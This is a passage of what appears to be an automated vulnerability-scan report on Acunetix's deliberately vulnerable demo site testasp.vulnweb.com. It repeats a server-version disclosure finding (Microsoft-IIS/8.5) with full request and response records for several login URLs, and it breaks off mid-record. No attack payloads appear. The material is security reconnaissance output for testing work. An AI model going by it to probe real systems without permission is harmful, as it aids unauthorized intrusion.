| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a 